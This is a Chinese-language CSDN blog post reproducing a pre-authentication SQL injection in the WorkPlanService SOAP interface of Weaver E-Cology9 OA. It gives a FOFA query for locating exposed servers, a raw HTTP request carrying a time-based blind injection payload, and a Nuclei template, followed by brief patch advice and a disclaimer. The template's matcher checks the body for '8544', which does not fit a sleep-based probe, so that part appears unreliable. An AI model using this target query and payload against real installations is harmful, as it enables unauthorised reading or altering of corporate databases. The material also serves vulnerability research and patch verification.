【漏洞复现】泛微E-Cology9 WorkPlanService 前台SQL注入

于 2024-07-29 13:15:41 发布
阅读量1k 收藏 6
点赞数 6
分类专栏: 漏洞复现 文章标签: SQL注入 泛微 E-cology 威胁情报
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/140765849
版权

文章目录

0x00 漏洞描述

泛微E-Cology9 是泛微网络科技股份有限公司开发的一款高效、灵活、全面的企业信息化办公系统。
泛微E-Cology9 中的 /services/WorkPlanService 接口存在SQL注入漏洞,攻击者可构造SOAP 请求进行SQL注入,窃取或修改数据库敏感信息,进一步利用可能获取目标系统权限。

影响范围

泛微补丁包<10.65.0

0x01 测绘工具

fofa: app=“泛微-OA(e-cology)”
在这里插入图片描述
在这里插入图片描述

0x02 漏洞复现

POST /services/WorkPlanService HTTP/1.1
HOST: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Connection: close
 
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
    <soapenv:Header/>
      <soapenv:Body>
      <web:deleteWorkPlan>
         <!--type: string-->
         <web:in0>(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)</web:in0>
         <!--type: int-->
         <web:in1>22</web:in1> 
      </web:deleteWorkPlan>
      </soapenv:Body>
</soapenv:Envelope>

在这里插入图片描述

0x03 Nuclei检测脚本

id: 泛微E-Cology9 WorkPlanService 前台SQL注入

info:
  name: 泛微E-Cology9 WorkPlanService 前台SQL注入
  author: admin
  severity: high
  description: This template detects SQL Injection vulnerabilities in SOAP-based web services.

requests:
  - raw:
      - |
        POST /services/WorkPlanService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
        Content-Type: text/xml;charset=UTF-8
        Connection: close

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
            <soapenv:Header/>
            <soapenv:Body>
                <web:deleteWorkPlan>
                    <web:in0>{{Payload}}</web:in0>
                    <web:in1>22</web:in1>
                </web:deleteWorkPlan>
            </soapenv:Body>
        </soapenv:Envelope>
    payloads:
      - name: Payload
        values:
          - "(SELECT 8544 FROM (SELECT(SLEEP(5-(IF(27=27,0,5)))))NZeo)"
    matchers:
      - type: word
        words:
          - "8544"
        part: body
    matchers-condition: and

0x04 修复建议

官方已发布升级补丁包,支持在线升级和离线补丁安装
https://www.weaver.com.cn/cs/securityDownload.html

0x05 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。
请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。
作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

今天是 几号
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
泛微e-cology 9 WorkflowServiceXml接口处SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 558
泛微e-cology 9 WorkflowServiceXml接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
泛微E-Cology WorkflowServiceXml SQL注入漏洞复现(QVD-2024-26136)
0xSec
07-12 1858
2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)
ZL_1618的博客
03-09 1805
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology9中存在SQL注入漏洞,未经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
泛微OA e-cology FileDownloadForOutDoc前台SQL注入漏洞
maverickpig的博客
08-09 1958
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。更多复现文章可关注:网安小白成长日记。
漏洞复现泛微OA E-Cology getdata.jsp SQL注入漏洞
凝聚力安全团队
07-18 423
泛微OA E-Cology getdata.jsp 接口存在一个 SQL 注入漏洞,通过这个漏洞可以操纵服务器的数据库。这意味着不法分子可以利用这个漏洞来获取对数据库的完全控制权,从而查看、修改甚至删除数据库中的数据,严重威胁系统的安全性。
漏洞复现泛微 e-cology 前台SQL注入漏洞
2301_79099363的博客
07-12 2123
漏洞复现泛微 e-cology 前台SQL注入漏洞
泛微e-cology9 SQL注入(CNVD-2023-12632)
qq_61968245的博客
07-19 580
泛微e-cology9 SQL注入(CNVD-2023-12632)
泛微 E-cology V9 信息泄露漏洞
孤桜懶契
06-18 5063
泛微OA E-Cology信息泄露 API接口漏洞只针对e-cology v9.0版本才有用,JS文件中有一个API接口
泛微 OA e-cology9 存在 sql 注入
nnn2188185的博客
04-29 1457
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发泛微 E-Cology9 协同办公系统是一套基于 JSP 及 SQL Server 数据库的 OA 系统,包括知识文档管理、人力资源管理、客户关系管理、项目管理、财务管理、工作流程管理、数据中心等打造协同高效的企业管理环境,突破企业人、财、物、信息、流程等各种资源之间的屏障,并将集团各企业、企业各部门、各分支机构、以及企业与外部的供应商、分销商、客户及其他合作伙伴等整合在一个统一的平台上,使企业变成一个电子化的内外部协同工作的组织。
泛微E-Cology9 WorkPlanService 前台SQL注入漏洞复现(XVE-2024-18112)
最新发布
0xSec
07-26 902
2024年7月,泛微官方发布了新补丁,修复了一处SQL注入漏洞。经分析,攻击者无需认证即可利用该漏洞,建议受影响的客户尽快修复漏洞
漏洞复现泛微E-Cology WorkflowServiceXml SQL注入漏洞
失心少年
07-22 583
泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
【1day】复现泛微e-cology9 SQL注入高危漏洞
记录并分享学习安全的知识点..
04-13 895
复现泛微e-cology9 SQL注入高危漏洞
泛微E-Cology ProcessOverRequestByXml 任意文件读取漏洞复现
0xSec
04-11 1359
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
0day 未公开 泛微E-Cology 存在源码信息泄露漏洞
weixin_43167326的博客
07-09 988
泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。。
CNVD-2023-12632 泛微e-cology9 sql注入 附poc
三天不打上房揭瓦的博客
03-18 5056
由于泛微e-cology9中对用户前台输入的数据未做校验,可以通过构造恶意的数据包导致SQL注入漏洞,进一步获取敏感数据。
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
qq_50854662的博客
03-20 7965
漏洞复现 泛微OA E-Cology V9 browser.jsp SQL注入漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值